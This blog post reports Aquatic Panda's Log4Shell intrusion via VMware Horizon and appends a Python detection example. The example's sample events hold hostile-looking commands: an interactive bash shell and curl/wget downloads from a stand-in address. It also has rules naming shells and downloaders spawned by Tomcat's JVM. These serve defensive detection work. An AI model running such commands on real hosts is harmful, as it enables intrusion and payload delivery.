WootCloud Blog

Chinese APT Hackers Exploiting Log4Shell and Lessons About Open Source Security

As we recently posted, Log4j, the Log4Shell vulnerability in it, and its ubiquitous use in common infrastructure products from Microsoft, Apple, Twitter, CloudFlare and, more recently, VMware (specifically the Tomcat web server in VMware Horizon), among others, leave all of them highly exposed to attack.

Specifically, CrowdStrike Falcon researchers wrote that the China-based threat actor called Aquatic Panda performed multiple connectivity checks via DNS lookups for a subdomain under dns[.]1433[.]eu[.]org, executed under the Apache Tomcat service running on the VMware Horizon instance, then executed a series of Linux commands, including attempting to execute a bash-based interactive shell with a hardcoded IP address as well as curl and wget commands in order to retrieve threat-actor tooling hosted on remote infrastructure.

The targets included a large, undisclosed academic institution.

The victim organization eventually patched the vulnerable application, which prevented further action from Aquatic Panda on the host and stopped the attack, researchers said.

“The discussion globally around Log4j has been intense, putting many organizations on edge,” OverWatch researchers wrote. “No organization wants to hear about such a potentially destructive vulnerability affecting its networks.”

Indeed, the flaw already has created considerable headache for organizations and security researchers alike since its discovery earlier this month. Attackers immediately jumped on Log4Shell, spawning 60 variants of the original exploit created for the flaw in a 24-hour period when it was first revealed. Though Apache moved quickly to patch it, the fix also turned problematic, creating a vulnerability of its own.

Aquatic Panda’s malicious behavior went beyond conducting reconnaissance of the compromised host, starting with making an effort to stop a third-party endpoint detection and response (EDR) service, before proceeding to retrieve next-stage payloads designed to obtain a reverse shell and harvest credentials.

But after the victim organization was alerted to the incident, the entity “was able to quickly implement their incident response protocol, eventually patching the vulnerable application and preventing further threat actor activity on the host.” In light of the attack’s successful disruption, the exact intent remains unknown.
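The behaviour chain described above (the Tomcat service spawning an interactive bash shell, curl and wget, plus DNS connectivity checks under the reported domain) maps directly onto host-side detection rules. The following is an added example and not code from WootCloud or CrowdStrike; the event shapes, paths and addresses are constructed, and the domain suffix is the one the post reports, refanged for matching.

```python
import re

# Constructed process-creation events in the shape an EDR or auditd pipeline
# might emit for a Linux host: (parent image, child image, command line).
# The post-exploitation commands run under the Tomcat service, so their parent
# is the Tomcat JVM. Paths and the 192.0.2.x documentation address are made up.
SAMPLE_PROCESS_EVENTS = [
    ("/opt/tomcat/bin/java", "/bin/bash", "bash -i"),
    ("/opt/tomcat/bin/java", "/usr/bin/curl", "curl -o /tmp/t http://192.0.2.10/t"),
    ("/opt/tomcat/bin/java", "/usr/bin/wget", "wget http://192.0.2.10/t2"),
    ("/opt/tomcat/bin/java", "/usr/bin/id", "id"),
    ("/bin/bash", "/usr/bin/curl", "curl https://repo.example/index"),
    ("/opt/tomcat/bin/java", "/opt/tomcat/bin/java", "java -jar tool.jar"),
]

# Constructed DNS query log: (querying process, queried name).
SAMPLE_DNS_QUERIES = [
    ("java", "a1b2c3.dns.1433.eu.org"),
    ("java", "time.example.net"),
]

# A JVM serving web requests has no business spawning a shell or a downloader.
JVM_PARENT = re.compile(r"(^|/)java$")
DOWNLOADERS = {"curl", "wget"}
SHELLS = {"bash", "sh", "dash", "zsh"}
# Suffix of the domain used for the actor's connectivity checks,
# written dns[.]1433[.]eu[.]org in the post.
WATCHED_SUFFIXES = ("1433.eu.org",)

def flag_process_events(events):
    """Return (rule name, command line) for each event that matches a rule."""
    hits = []
    for parent, child, cmdline in events:
        if not JVM_PARENT.search(parent):
            continue
        name = child.rsplit("/", 1)[-1]
        argv = cmdline.split()
        if name in SHELLS and "-i" in argv[1:]:
            hits.append(("jvm_spawns_interactive_shell", cmdline))
        elif name in DOWNLOADERS:
            hits.append(("jvm_spawns_downloader", cmdline))
    return hits

def flag_dns_queries(queries, suffixes=WATCHED_SUFFIXES):
    """Return queried names that fall under a watched domain suffix."""
    return [q for _, q in queries
            if any(q == s or q.endswith("." + s) for s in suffixes)]
```

In production the same two rules would run over the EDR's live process and DNS telemetry; stopping the EDR agent, which the post notes the actor attempted, is itself a third event worth alerting on.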

The question to ask is how to manage thousands of contributors to thousands of OSS projects to the security standards needed to protect national and corporate security interests – Apache? Google? The Feds?

To learn more in a zero touch, no obligation Demo or POC, please contact us.

Contributing Authors:

Andreas Stenzel
